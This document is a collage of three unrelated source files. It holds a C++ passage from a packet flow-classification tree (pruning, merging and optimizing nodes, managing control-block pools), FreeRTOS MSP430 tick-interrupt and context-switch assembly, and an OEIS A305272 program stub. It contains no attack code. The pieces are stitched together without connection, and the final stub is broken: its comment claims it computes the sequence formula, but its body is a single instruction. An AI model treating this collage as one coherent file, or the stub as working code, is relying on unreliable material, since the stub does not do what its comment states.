void FlowNodePtr::default_combine(FlowNode* p, FlowNodePtr* other, bool as_child, bool priority, Element* origin) {
//No default on our side: simply adopt other's pointer as our new default.
if (this->ptr == 0) { //We don't have default
debug_flow("No node, attaching other");
*this = (*other);
} else { //We have default, other have default
debug_flow("We have a node or a leaf %d %d , p %d",this->is_leaf(),other->is_leaf(),priority);
if (this->is_leaf() && other->is_leaf()) { //Our default is a leaf and other default is a leaf
if (!priority) {
//Without priority other's leaf wins: release ours and take theirs.
FCBPool::init_release(this->leaf);
this->leaf = other->leaf;
} else {
//With priority, merge other's FCB data into ours; a conflict is fatal.
if (!this->leaf->combine_data(other->leaf->data, origin))
abort();
//Early-drop only survives the merge if both leaves agree on it.
if (this->leaf->is_early_drop() && !other->leaf->is_early_drop())
this->leaf->set_early_drop(false);
}
} else if (this->is_node()) { //Our default is a node, other is a leaf or a node
this->node_combine_ptr(p, *other, as_child, priority, false, origin);
} else { //other default is node, our is leaf
//We replace all other leaf with our data
other->node->leaf_combine_data_create(this->leaf, true, true, !priority || other->node->level()->is_dynamic(), origin);
flow_assert(other->node->has_no_default());
this->set_node(other->node);
}
}
//Whatever branch was taken, the result becomes a child of p.
this->set_parent(p);
}
/**
 * Invoke the given callback once per non-default child pointer of this node.
 */
void FlowNode::apply(std::function<void(FlowNodePtr*)> fnt) {
    NodeIterator children = iterator();
    for (FlowNodePtr* child = children.next(); child != 0; child = children.next()) {
        fnt(child);
    }
}
/**
 * Invoke the callback for every child pointer, then for the default
 * pointer if one is set.
 */
void FlowNode::apply_default(std::function<void(FlowNodePtr*)> fnt) {
    apply(fnt);
    if (_default.ptr != 0)
        fnt(&_default);
}
/**
* Remove all branch of the tree that fully match the given leaf.
*/
/*FlowNodePtr FlowNodePtr::remove_matching(FlowControlBlock* leaf) {
traverse_all_leaves([this](FlowNodePtr* node){
bool remove = false;
leaf->parent()->traverse_parents([](FlowNode* parent) {
//if (node->prune())
});
FlowNodePtr dup = this->duplicate();
if (dup)
});
}
//TODO
*/
/**
* Prune the tree by adding the knowledge that the given level will or will not (inverted) be of the given value
* if inverted, it means the level will NOT be data
*/
FlowNodePtr FlowNode::prune(FlowLevel* olevel,FlowNodeData data, bool inverted, bool &changed) {
if (is_dummy()) { //If we are dummy, we cannot prune
return FlowNodePtr(this);
}
FlowNodePtr ptr(this);
debug_flow("Prune level %s(dyn%d) with %s(dyn%d), i %d, data %llu",
level()->print().c_str(),level()->is_dynamic(),
olevel->print().c_str(),olevel->is_dynamic(),
inverted,
data.get_long());
if (level()->is_dynamic()) { //If we are dynamic, we can remove from our mask the mask of the second value
debug_flow("Pruning a dynamic level...");
if (inverted && !olevel->is_dynamic()) {//We're in the default path, nothing to remove as it won't help that we know we won't see some static value
debug_flow("Inverted...");
} else { //Not inverted (we will see the given value), or inverted but other is a dynamic value meaning that the bits of level will be known when reaching this value
/* if ((olevel->is_dynamic() && !inverted)) {//We would be in the child of a dynamic level that is not on a defautl path
print();
assert(false);
}*/ //ALLOWED FOR VERIF-PRUNING
/**
* If other is dynamic or not does not matter, we will have those bits fixed, so we remove it from our dynamic mask
*/
if (this->level()->prune(olevel)) {
changed = true;
//If pruning removed every bit of the mask, this level no longer
//classifies anything: collapse to (the pruned version of) the default.
if (!this->level()->is_usefull()) {
//print();
debug_flow("Not usefull anymore, returning default !");
assert(this->getNum() == 0);
changed= true;
if (_default.is_node()) {
debug_flow("Node");
ptr = _default.node->prune(olevel, data, inverted, changed);
} else {
debug_flow("Leaf");
ptr = _default;
}
} else {
assert(this->getNum() == 0);
/*ptr.node->apply_default([ptr,olevel,data,inverted,&changed](FlowNodePtr* cur){
if (cur->is_leaf()) {
return;
}
FlowNodeData old_data = cur->data();
FlowNodePtr newcur = cur->node->prune(olevel, data, inverted, changed);
if (cur->ptr == newcur.ptr) //CHild did not change
return;
changed = true;
assert(newcur.ptr != 0);
if (newcur.is_node()) {
newcur.node->check();
}
*cur = newcur;
cur->set_data(old_data);
cur->set_parent(ptr.node);
});*/
}
}
}
} else {
debug_flow("Pruning a static level (inverted%d)...",inverted);
if (olevel->is_dynamic()) {
//At this time the value will be known... But that does not help us
click_chatter("Static child of a dynamic parent.");
assert(false);
} else {
if (inverted) {
if (olevel->equals(this->level())) { //Same level
//Remove data from level if it exists
debug_flow("Same level!");
bool need_grow;
FlowNodePtr* ptr_child = find(data,need_grow);
FlowNodePtr child = *ptr_child;
if (child.ptr) {
ptr_child->ptr = 0;
dec_num();
}
changed = true;
//TODO delete child
}
} else {
//Non-inverted static case: let the level itself decide what to keep.
ptr = _level->prune(olevel, data, this, changed);
}
}
/*if (level->equals(this->level())) { //Same level
if (inverted) {
//Remove data from level if it exists
FlowNodePtr* ptr = find(data);
FlowNodePtr child = *ptr;
ptr->ptr = 0;
dec_num();
changed = true;
//TODO delete child
} else {
//Return the child
FlowNodePtr* ptr = find_or_default(data);
FlowNodePtr child = *ptr;
dec_num();
ptr->ptr = 0;
//TODO delete this;
changed = true;
return child;
}
}*/
}
//A leaf cannot be pruned further.
if (ptr.is_leaf()) {
return ptr;
}
/**
* Prune all child node including default
*/
ptr.node->apply_default([ptr,olevel,data,inverted,&changed](FlowNodePtr* cur){
if (cur->is_leaf()) {
return;
}
FlowNodeData old_data = cur->data();
FlowNodePtr newcur = cur->node->prune(olevel, data, inverted, changed);
if (cur->ptr == newcur.ptr) //CHild did not change
return;
changed = true;
assert(newcur.ptr != 0);
if (newcur.is_node()) {
newcur.node->check();
}
//Splice the pruned child in, restoring its key data and parent link.
*cur = newcur;
cur->set_data(old_data);
cur->set_parent(ptr.node);
});
/**
* If inverted and there is no more children, remove the node
*/
if (inverted) {
if (getNum() == 0 && !this->level()->is_dynamic()) {
//All child values were removed, return the default
FlowNodePtr def = *default_ptr();
default_ptr()->ptr = 0;
changed = true;
delete this;
return def;
}
}
return ptr;
}
/**
* Replace data in all leaf, without creating new ones.
*/
/**
 * Merge the data of the given FCB into every existing leaf of this node.
 * Unlike leaf_combine_data_create(), no new leaves are created; a merge
 * conflict aborts.
 */
void FlowNode::leaf_combine_data(FlowControlBlock* leaf, bool do_final, bool do_default, Element* origin) {
    auto merge_into = [leaf, origin](FlowNodePtr* cur) -> bool {
        if (!cur->leaf->combine_data(leaf->data, origin))
            abort();
        // A leaf only stays an early drop if the merged-in FCB is one too.
        bool other_is_early_drop = leaf->is_early_drop();
        if (!other_is_early_drop && cur->leaf->is_early_drop())
            cur->leaf->set_early_drop(false);
        return true;
    };
    traverse_all_leaves(merge_into, do_final, do_default);
}
/**
* Replace data in all leaf, creating new ones
*/
/**
 * Merge the data of the given FCB into every leaf of this node, duplicating
 * the FCB into empty default slots so that every path ends in a leaf.
 * If discard_my_fcb_data is set, existing leaves keep their own data.
 */
void FlowNode::leaf_combine_data_create(FlowControlBlock* leaf, bool do_final, bool do_default, bool discard_my_fcb_data, Element* origin) {
    auto merge_or_create = [leaf, discard_my_fcb_data, origin](FlowNodePtr* cur, FlowNode* parent) -> bool {
        if (cur->leaf == 0) {
            // Empty slot: materialize a private copy of the given FCB.
            cur->set_leaf(leaf->duplicate(1));
            cur->set_parent(parent);
            return true;
        }
        if (discard_my_fcb_data)
            return true;
        if (!cur->leaf->combine_data(leaf->data, origin))
            abort();
        // Early-drop only survives if the merged-in FCB is an early drop too.
        if (cur->leaf->is_early_drop() && !leaf->is_early_drop())
            cur->leaf->set_early_drop(false);
        return true;
    };
    traverse_all_leaves_and_empty_default(merge_or_create, do_final, do_default);
}
/**
* Replace a leaf with a node. Return true if
* data from the parent allowed to prune the child (eg, the child contained a match for
* tcp port 80, but our parent already had it, or already cassify in a tcp port other than 80, in which case
* other is completely killed.
*/
bool FlowNodePtr::replace_leaf_with_node(FlowNode* other, bool discard, Element* origin) {
assert(is_leaf());
assert(ptr);
bool changed = false;
FlowNodeData old_data = data();
FlowNode* old_parent = parent();
if (old_parent == 0) {
click_chatter("Replacing leaf that has no parent !");
assert(false);
}
FlowControlBlock* old_leaf = leaf;
//Work on a deep copy of other so the caller's tree stays intact.
FlowNodePtr no(other->duplicate(true, 1, true));
flow_assert(other->is_full_dummy() || !other->is_dummy());
#if DEBUG_CLASSIFIER
click_chatter("Replacing leaf");
print();
click_chatter("Of:");
if (this->parent() and this->parent()->parent())
this->parent()->root()->print();
else if (this->parent())
this->parent()->print();
else
this->print();
click_chatter("With other :");
no.print();
#endif
//Prune the downward tree with all values of the future new parent
FlowNode* gparent = old_parent;
FlowNodeData gdata = old_data;
bool was_default = old_parent->default_ptr()->ptr == leaf;
//Walk up the ancestry; at each level, inject what is already known about
//the classification into the copied subtree.
while (gparent != NULL) {
//If this level was a default level, we must remove all known values of this level from the child
if (was_default and !gparent->level()->is_dynamic()) {
FlowNode::NodeIterator it = gparent->iterator();
FlowNodePtr* cur;
while ((cur = it.next()) != 0) {
no = no.node->prune(gparent->level(), cur->data(), true, changed);
}
} else
no = no.node->prune(gparent->level(),gdata, was_default, changed);
if (!no.ptr) { //Completely pruned, keep the FCB as it.
debug_flow("Completely pruned");
return true;
}
if (no.is_leaf()) {
break;
}
no.check();
gdata = gparent->node_data;
FlowNode* child = gparent;
gparent = gparent->parent();
was_default = !gparent || child == gparent->default_ptr()->node;
}
//Replace the pointer by the new
*this = no;
set_data(old_data);
set_parent(old_parent);
#if DEBUG_CLASSIFIER
if (changed) {
debug_flow("Pruned other : ");
no.print();
no.check();
} else {
debug_flow("Pruning did not change the node.");
}
#endif
//Combine FCB data
if (!discard) {
if (is_leaf()) {
if (!leaf->combine_data(old_leaf->data, origin))
abort();
if (leaf->is_early_drop() && !old_leaf->is_early_drop())
leaf->set_early_drop(false);
} else {
node->leaf_combine_data(old_leaf,true,true,origin); //We do all here as the downward must be completely updated with our data
}
}
return changed;
//NOTE(review): the lines below are dead code kept as a reminder.
//Release original leaf
//TODO old_leaf->release(1);
}
/**
* Replace all leave of this node per another node (that will be deep duplicated for each replacement)
* Combines FCB values, asserting that they are equals or one is unset
*
*/
/**
 * Replace every leaf of this node by a deep duplicate of the given node,
 * merging FCB data along the way (see replace_leaf_with_node()).
 * Returns this node; a null other is a no-op.
 */
FlowNode* FlowNode::replace_leaves(FlowNode* other, bool do_final, bool do_default, bool discard_my_fcb_data, Element* origin) {
    assert(do_final);   //Protect against legacy
    assert(!do_default); //Protect against legacy
    if (other == 0)
        return this;
    flow_assert(!other->is_dummy());
    traverse_all_leaves([other, discard_my_fcb_data, origin](FlowNodePtr* cur) -> bool {
        assert(cur != 0);
        assert(cur->ptr != 0);
        cur->replace_leaf_with_node(other, discard_my_fcb_data, origin);
        return true;
    }, do_final, do_default);
    //TODO delete other;
    return this;
}
/**
* Optimize table, changing nodes perf the appropriate data structure, removinf useless classification step entries
* If the path is not mt-safe but reaches a non-mutable level (eg dynamic), a thread node will be added
*/
FlowNode* FlowNode::optimize(Bitvector threads) {
FlowNodePtr* ptr; //NOTE(review): appears unused in this function.
//Before everything else, remove this level if it's dynamic but useless
if (level()->is_dynamic() && !level()->is_usefull()) {
assert(getNum() == 0);
//No nead for this level
if (default_ptr()->is_node()) {
#if DEBUG_CLASSIFIER
click_chatter("Optimize : no need for this dynamic level");
#endif
_default.set_parent(0);
return _default.node->optimize(threads);
} else {
click_chatter("WARNING : useless path, please specify this to author");
}
}
if (level()->is_mt_safe()) {
assert(threads.weight() == 1);
//TODO : if lock, it is a different story
}
_level = level()->optimize(this);
FlowNode* newnode;
//Dynamic level reached by more than one thread: insert a per-thread
//dispatch node with one duplicated, per-CPU-optimized subtree per thread.
if (level()->is_dynamic() && threads.weight() > 1) {
click_chatter("Optimize : Inserting FlowLevelThread node");
FlowLevel* thread = new FlowLevelThread(click_max_cpu_ids());
FlowNodeArray* fa = FlowAllocator<FlowNodeArray>::allocate();
fa->initialize(thread->get_max_value() + 1);
newnode = fa;
newnode->_level = thread;
newnode->_parent = parent();
newnode->default_ptr()->ptr = 0; //BUG if an unexpected thread classify, this is expected
for (int i = 0; i < click_max_cpu_ids(); i++) {
//Re-optimize each duplicate with a single-thread bitvector.
Bitvector tb(threads.size(), false);
tb[i] = true;
FlowNode* newNode = this->duplicate(true,1,true)->optimize(tb);
//FlowNode* newNode = thread->create_node(def, false, false);
//newNode->_level = def->level();
//We keep an identical default, which breaks parent but
// that is not a problem at this stage for a dynamic default (will never be released from child)
//*newNode->default_ptr() = *fa->default_ptr()->node->default_ptr();
FlowNodeData data = FlowNodeData((uint32_t)i);
bool need_grow;
FlowNodePtr* child_ptr = newnode->find(data,need_grow);
child_ptr->set_node(newNode);
child_ptr->set_data(data);
child_ptr->set_parent(newnode);
newnode->inc_num();
}
goto newnode;
}
//Optimize default
if (_default.ptr && _default.is_node())
_default.node = _default.node->optimize(threads);
if (!level()->is_dynamic()) {
if (getNum() == 0) {
//No nead for this level
if (default_ptr()->is_node()) {
//if (dynamic_cast<FlowNodeDummy*>(this) == 0) {
#if DEBUG_CLASSIFIER
click_chatter("Optimize : no need for this level");
#endif
/*FlowNodeDummy* fl = new FlowNodeDummy();
fl->assign(this);
fl->_default = _default;
_default.ptr = 0;
delete this;
fl->check();
return fl;*/
_default.set_parent(0);
newnode = _default.node;
goto newnode;
//}
} else {
//TODO
click_chatter("Non dynamic level, without child that has a leaf as ptr");
this->print();
click_chatter("Parent:");
this->parent()->print();
assert(false);
}
} else if (getNum() == 1) {
//Single child: collapse to a dummy or two-case node, or drop the level.
FlowNodePtr* child = (iterator().next());
if (_default.ptr == 0) {
if (child->is_leaf()) {
#if DEBUG_CLASSIFIER
click_chatter("Optimize : one leaf child and no default value : creating a dummy level !");
//TODO : can't we set the child directly?
#endif
FlowNodeDummy* fl = new FlowNodeDummy();
fl->assign(this);
fl->set_default(child->optimize(threads));
newnode = fl;
} else { //Child is node
//NOTE(review): assumes this is a FlowNodeDefinition; the dynamic_cast
//result is dereferenced without a null check — confirm invariant.
FlowNodeDefinition* defnode = dynamic_cast<FlowNodeDefinition*>(this);
if (defnode->_else_drop) {
FlowNodeTwoCase* fl = new FlowNodeTwoCase(child->optimize(threads));
fl->assign(this);
fl->inc_num();
fl->set_default(_default);
newnode = fl;
_default.ptr = 0;
} else {
#if DEBUG_CLASSIFIER
click_chatter(("Optimize : one child ("+defnode->name()+") and no default value : no need for this level !").c_str());
#endif
newnode = child->node;
}
}
} else { //_default.ptr != 0
#if DEBUG_CLASSIFIER
click_chatter("Optimize : only 2 possible case (value %lu or default %lu)",child->data().get_long(),_default.data().get_long());
#endif
FlowNodeTwoCase* fl = new FlowNodeTwoCase(child->optimize(threads));
fl->assign(this);
fl->inc_num();
fl->set_default(_default);
newnode = fl;
_default.ptr = 0;
}
//Detach the child from this (now empty) node before discarding it.
child->set_parent(newnode);
child->ptr = 0;
dec_num();
assert(getNum() == 0);
//TODO delete this;
newnode->check();
goto newnode;
} else if (getNum() == 2) {
//Two children: specialize into a two- or three-case node.
#if DEBUG_CLASSIFIER
click_chatter("Optimize : node has 2 children");
#endif
NodeIterator cit = iterator();
FlowNodePtr* childA = (cit.next());
FlowNodePtr* childB = (cit.next());
//Put the else-drop child (if any) in the B slot.
if (childB->else_drop() || !childA->else_drop()) {
FlowNodePtr* childTmp = childB;
childB = childA;
childA = childTmp;
}
if (_default.ptr == 0 && !childB->else_drop()) {
#if DEBUG_CLASSIFIER
click_chatter("Optimize : 2 child and no default value : only 2 possible case (value %lu or value %lu)!",childA->data().get_long(),childB->data().get_long());
#endif
FlowNodePtr newA = childA->optimize(threads);
FlowNodeTwoCase* fl = new FlowNodeTwoCase(newA);
fl->inc_num();
fl->assign(this);
FlowNodePtr newB = childB->optimize(threads);
fl->set_default(newB);
newA.set_parent(fl);
newB.set_parent(fl);
newnode = fl;
} else {
#if DEBUG_CLASSIFIER
click_chatter("Optimize : only 3 possible cases (value %lu, value %lu or default %lu)",childA->data().get_long(),childB->data().get_long(),_default.data().get_long());
#endif
FlowNodePtr ncA = childA->optimize(threads);
FlowNodePtr ncB = childB->optimize(threads);
#if DEBUG_CLASSIFIER
click_chatter("The 2 cases are :");
ncA.print();
click_chatter("And :");
ncB.print();
#endif
FlowNodeThreeCase* fl = new FlowNodeThreeCase(ncA,ncB);
fl->inc_num();
fl->inc_num();
fl->assign(this);
fl->set_default(_default);
ncA.set_parent(fl);
ncB.set_parent(fl);
_default.set_parent(fl);
newnode = fl;
_default.ptr = 0;
}
childA->ptr = 0;
childB->ptr = 0;
dec_num();
dec_num();
assert(getNum() == 0);
//TODO delete this;
newnode->check();
goto newnode;
} else {
#if DEBUG_CLASSIFIER
click_chatter("No optimization for level with %d children",getNum());
#endif
newnode = dynamic_cast<FlowNodeDefinition*>(this)->create_final(threads);
goto newnode;
}
} else {
#if DEBUG_CLASSIFIER
click_chatter("Dynamic level won't be optimized");
#endif
newnode = dynamic_cast<FlowNodeDefinition*>(this)->create_final(threads);
goto newnode;
}
//Unhandled case?
assert(false);
return this;
//Common exit: every path above lands here with newnode set.
newnode:
#if DEBUG_CLASSIFIER
assert(newnode);
newnode->threads = threads;
#endif
return newnode;
}
/**
 * Optimize the pointed-to subtree. Leaves are returned unchanged; nodes are
 * optimized with their key data preserved and re-checked.
 */
FlowNodePtr FlowNodePtr::optimize(Bitvector threads) {
    if (is_leaf())
        return *this;
    FlowNodePtr result = *this;
    FlowNodeData saved_data = node->node_data;
    result.node = node->optimize(threads);
    result.node->node_data = saved_data;
    result.node->check();
    return result;
}
/**
 * Whether this pointer is a definition node flagged as "else drop".
 * Leaves never are.
 */
bool FlowNodePtr::else_drop() {
    return is_leaf() ? false : dynamic_cast<FlowNodeDefinition*>(node)->_else_drop;
}
/**
* True if no data is set in the FCB.
*/
/**
 * True if no data is set in the FCB past the leading FlowNodeData slot.
 */
bool FlowControlBlock::empty() {
    const unsigned end = get_pool()->data_size();
    for (unsigned i = sizeof(FlowNodeData); i < end; i++) {
        if (data[i] == 0)
            continue;
        debug_flow("data[%d] = %x is different",i,data[i]);
        return false;
    }
    return true;
}
void FlowControlBlock::print(String prefix, int data_offset, bool show_ptr) const {
//Hex dump buffer sized for the whole payload plus a NUL terminator.
//NOTE(review): assumes data_size() > 0, otherwise data_str stays uninitialized.
char data_str[(get_pool()->data_size()*2)+1];
int j = 0;
if (data_offset == -1) {
//Dump the whole payload, truncated to 30 bytes (60 hex characters).
for (unsigned i = 0; i < get_pool()->data_size() && j < 60;i++) {
sprintf(&data_str[j],"%02x",data[i]);
j+=2;
}
} else {
//Dump only the single requested byte.
sprintf(&data_str[j],"%02x",data[data_offset]);
}
//Careful: the #if below sits inside an unbraced if/else on purpose — each
//branch of the preprocessor conditional supplies exactly one statement.
if (show_ptr)
#if DEBUG_CLASSIFIER
click_chatter("%s %lu Parent:%p UC:%d ED:%d T:%d (%p data %s)",prefix.c_str(),node_data[0].get_long(),parent,count(),is_early_drop(),thread,this,data_str);
#else
click_chatter("%s %lu Parent:%p UC:%d ED:%d (%p data %s)",prefix.c_str(),node_data[0].get_long(),parent,count(),is_early_drop(),this,data_str);
#endif
else
click_chatter("%s %lu UC:%d ED:%d (data %s)",prefix.c_str(),node_data[0].get_long(),count(),is_early_drop(),data_str);
}
/**
 * Print this FCB, then recursively print each of its ancestors up to the
 * root of the classification tree.
 *
 * Fix: removed an unused local copy of `parent` that was never read.
 */
void FlowControlBlock::reverse_print() {
    String prefix = "";
    print(prefix);
    if (parent)
        parent->reverse_print();
}
/**
 * Walk up the parent chain and return the root node of the tree this FCB
 * belongs to, or 0 if the FCB has no parent at all.
 *
 * Fix: the previous implementation advanced the cursor until it became
 * null and then returned it, so it always returned 0 instead of the root.
 * We now stop at the last node whose parent is null.
 */
FlowNode* FlowControlBlock::find_root() {
    FlowNode* p = parent;
    while (p != 0 && p->parent() != 0) {
        p = p->parent();
    }
    return p;
}
int FlowControlBlock::hashcode() const {
//Start from the flags, then fold in the payload word by word.
int code = flags;
//NOTE(review): assumes data_size() >= sizeof(FlowNodeData) and that the
//payload past the first FlowNodeData slot is 4-byte readable — confirm.
for (int i = 0; i < (get_pool()->data_size() - sizeof(FlowNodeData)) / 4; i ++) {
code += *(((uint32_t*)&node_data[1].data_32) + i);
}
return code;
}
//Two FCB references are equal iff flags, owning pool and the payload past
//the leading FlowNodeData slot are all identical.
bool operator==(const FlowControlBlockRef &ar, const FlowControlBlockRef &br) {
FlowControlBlock &a = *ar._ref;
FlowControlBlock &b = *br._ref;
if (a.flags != b.flags) {
//click_chatter("diff flags");
return false;
}
if (a.get_pool() != b.get_pool()) {
//click_chatter("diff pool");
return false;
}
//Raw byte compare of the payload, skipping the first FlowNodeData slot.
if (memcmp(&(a.node_data[1].data_32),&(b.node_data[1].data_32), a.get_pool()->data_size() - sizeof(FlowNodeData)) != 0) {
/* click_chatter("diff content %d", a.get_pool()->data_size());
a.print("");
b.print("");*/
return false;
}
return true;
}
/*FlowControlBlock::FlowControlBlock(const FlowControlBlock &c) {
click_chatter("copy const");
memcpy(&node_data, &c.node_data, get_pool()->data_size());
}*/
/**
 * Print the pointed-to leaf or node, forwarding the optional data offset.
 */
void FlowNodePtr::print(int data_offset) const {
    if (!is_leaf()) {
        node->print(data_offset);
        return;
    }
    leaf->print("",data_offset);
}
//Merge another FCB's payload into ours, byte by byte.
//The second half of the data array (offset by init_data_size()) acts as a
//per-byte "is set" marker: 0xff means the corresponding payload byte holds
//a meaningful value. Returns false (after loud warnings) on conflict.
bool FlowControlBlock::combine_data(uint8_t* data, Element* origin) {
for (unsigned i = sizeof(FlowNodeData); i < get_pool()->data_size();i++) {
if (data[i + FCBPool::init_data_size()] == 0)
continue; //Other byte unset: nothing to merge.
if (this->data[i + FCBPool::init_data_size()] == 0) {
//Ours unset: copy other's byte and mark it set.
this->data[i] = data[i];
this->data[i + FCBPool::init_data_size()] = 0xff;
} else {
//Both set: they must agree, otherwise the classification is ambiguous.
if (this->data[i] != data[i]) {
click_chatter("!!!");
click_chatter("WARNING : CONFLICTING CLASSIFICATION !");
click_chatter("%p{element} has two sub-path that clash. This usually happen if two output ports have similar classification, such as sending IP packets both to port 0 and port 1. Context of each ports must be entierly exclusives.",origin);
click_chatter("They merge with different FCB values (%x, %x at offset %d), hence different decisions!",this->data[i], data[i],i);
click_chatter("WARNING : CONFLICTING CLASSIFICATION !");
click_chatter("!!!");
print("");
return false;
}
}
}
return true;
}
//Create a classification node for this level.
//When `better` is set, the new node must be one hash-size step larger than
//the given parent (used for growth); otherwise the current level size is
//kept. Falls back to a direct-indexed array when the value space is small
//enough. Returns 0 when growth is impossible.
FlowNode* FlowLevel::create_node(FlowNode* parent, bool better, bool better_impl) {
int l;
if (better) {
//Recover the hash size of the parent node from its concrete type.
if (dynamic_cast<FlowNodeHash<0>*>(parent) != 0) {
l = 0;
} else if (dynamic_cast<FlowNodeHash<1>*>(parent) != 0) {
l = 1;
} else if (dynamic_cast<FlowNodeHash<2>*>(parent) != 0) {
l = 2;
} else if (dynamic_cast<FlowNodeHash<3>*>(parent) != 0) {
l = 3;
} else if (dynamic_cast<FlowNodeHash<4>*>(parent) != 0) {
l = 4;
} else if (dynamic_cast<FlowNodeHash<5>*>(parent) != 0) {
l = 5;
} else if (dynamic_cast<FlowNodeHash<6>*>(parent) != 0) {
l = 6;
} else if (dynamic_cast<FlowNodeHash<7>*>(parent) != 0) {
l = 7;
} else if (dynamic_cast<FlowNodeHash<8>*>(parent) != 0) {
l = 8;
} else if (dynamic_cast<FlowNodeHash<9>*>(parent) != 0) {
l = 9;
} else {
//Not a hash
click_chatter("I don't know how to grow non-hash yet.");
abort();
}
if (l == 9) {
//Already at the largest hash size: cannot grow further.
return 0;
}
++l;
if (l < current_level) { //TODO keep this as an aggressive mode
l = current_level;
}
}
else
{
l = current_level;
}
//A direct-indexed array beats a hash once it would cover the value space.
if (l >= 100 || FlowNodeHash<0>::capacity_for(l) >= this->get_max_value()) {
FlowNodeArray* fa = FlowAllocator<FlowNodeArray>::allocate();
fa->initialize(get_max_value() + 1);
l = 100; //NOTE(review): dead store — l is not read after this point.
return fa;
}
if (l > current_level)
current_level = l;
return FlowNode::create_hash(current_level);
}
/**
* Function not to be called at runtime ! Directly allocate
* the FCB using the right pool.
*/
//Deep-copy this FCB into a freshly init-allocated one (see the comment
//above: not for runtime use — it bypasses the per-thread pools).
FlowControlBlock* FlowControlBlock::duplicate(unsigned use_count) {
FlowControlBlock* fcb;
assert(FCBPool::initialized > 0);
//fcb = get_pool()->allocate();
fcb = FCBPool::init_allocate();
//fcb->release_ptr = release_ptr;
//fcb->release_fnt = release_fnt;
//Copy the header plus both halves of the data array (payload + set marks).
memcpy(fcb, this ,sizeof(FlowControlBlock) + (get_pool()->data_size() * 2));
#if HAVE_FLOW_DYNAMIC
fcb->use_count = use_count;
#endif
return fcb;
}
/**
 * Compress the per-thread free lists to the given thread set and pre-fill
 * each remaining list with SFCB_POOL_SIZE freshly allocated FCBs.
 */
void FCBPool::compress(Bitvector threads) {
    lists.compress(threads);
    for (unsigned i = 0; i < lists.weight(); ++i) {
        SFCBList &list = lists.get_value(i);
        int remaining = SFCB_POOL_SIZE;
        while (remaining-- > 0) {
            list.add(alloc_new());
        }
    }
}
/**
 * Allocate and zero an initialization-time FCB (payload + "set" marker
 * halves). Must be released with init_release(), which frees the same size.
 */
FlowControlBlock*
FCBPool::init_allocate() {
    FlowControlBlock* initfcb =
        (FlowControlBlock*)CLICK_LALLOC(sizeof(FlowControlBlock) + (init_data_size() * 2));
    initfcb->initialize();
    bzero(initfcb->data, (init_data_size() * 2));
    return initfcb;
}
/**
 * Release an FCB obtained from init_allocate(); the size passed to
 * CLICK_LFREE must match the allocation size exactly.
 */
void
FCBPool::init_release(FlowControlBlock* fcb) {
    const auto total = sizeof(FlowControlBlock) + (init_data_size() * 2);
    CLICK_LFREE(fcb, total);
}
//Global lock serializing FlowNode debug printing across threads.
Spinlock FlowNode::printlock;
//NOTE(review): presumably the FCB pool with the largest data size — confirm
//at the call sites that set it.
FCBPool* FCBPool::biggest_pool = 0;
//Counts initialized FCB pools; FlowControlBlock::duplicate() asserts > 0.
int FCBPool::initialized = 0;
#endif
#if HAVE_CTX
//NOTE(review): init future fired once the CTX tree is built; exact
//semantics live in CounterInitFuture — confirm there.
CounterInitFuture _ctx_builded_init_future("CTXBuilder", [](){});
#endif
CLICK_ENDDECLS
|
/*
* FreeRTOS Kernel V10.3.1
* Copyright (C) 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a copy of
* this software and associated documentation files (the "Software"), to deal in
* the Software without restriction, including without limitation the rights to
* use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
* the Software, and to permit persons to whom the Software is furnished to do so,
* subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*
* https://www.FreeRTOS.org
* https://github.com/FreeRTOS
*
* 1 tab == 4 spaces!
*/
#include "FreeRTOSConfig.h"
#include "portasm.h"
.CODE
/*
* The RTOS tick ISR.
*
* If the cooperative scheduler is in use this simply increments the tick
* count.
*
* If the preemptive scheduler is in use a context switch can also occur.
*/
/* Tick interrupt entry point (installed in the Timer A0 vector below). */
_vTickISR:
/* Save the context of the interrupted task. */
portSAVE_CONTEXT
call #_xTaskIncrementTick
/* xTaskIncrementTick leaves its result in r15: non-zero means a context
switch is required, zero means just restore the same task. */
cmp.w #0x00, r15
jeq _SkipContextSwitch
call #_vTaskSwitchContext
_SkipContextSwitch:
/* Restore the context of the (possibly new) task and return. */
portRESTORE_CONTEXT
/*-----------------------------------------------------------*/
/*
* Manual context switch called by the portYIELD() macro.
*/
_vPortYield::
/* Mimic an interrupt by pushing the SR. */
push SR
/* Now the SR is stacked we can disable interrupts. */
dint
/* Save the context of the current task. */
portSAVE_CONTEXT
/* Switch to the highest priority task that is ready to run. */
call #_vTaskSwitchContext
/* Restore the context of the new task. NOTE(review): the stacked SR is
expected to be restored as part of portRESTORE_CONTEXT (see portasm.h),
which re-enables interrupts — confirm in the macro definition. */
portRESTORE_CONTEXT
/*-----------------------------------------------------------*/
/*
* Start off the scheduler by initialising the RTOS tick timer, then restoring
* the context of the first task.
*/
_xPortStartScheduler::
/* Setup the hardware to generate the tick. Interrupts are disabled
when this function is called. */
call #_prvSetupTimerInterrupt
/* Restore the context of the first task that is going to run. This never
returns here: no instruction follows the restore. */
portRESTORE_CONTEXT
/*-----------------------------------------------------------*/
/* Place the tick ISR in the correct vector. */
.VECTORS
.KEEP
/* Timer A0 vector drives the RTOS tick (see _vTickISR above). */
ORG TIMERA0_VECTOR
DW _vTickISR
END
|
; A305272: a(n) = 836*2^n - 676.
; 160,996,2668,6012,12700,26076,52828,106332,213340,427356,855388,1711452,3423580,6847836,13696348,27393372,54787420,109575516,219151708,438304092,876608860,1753218396,3506437468,7012875612,14025751900,28051504476,56103009628,112206019932,224412040540,448824081756,897648164188,1795296329052,3590592658780,7181185318236,14362370637148,28724741274972,57449482550620,114898965101916,229797930204508,459595860409692,919191720820060,1838383441640796,3676766883282268,7353533766565212
; Computes a(n) = 836*2^n - 676 as 836*(2^n - 1) + 160.
mov $1,2
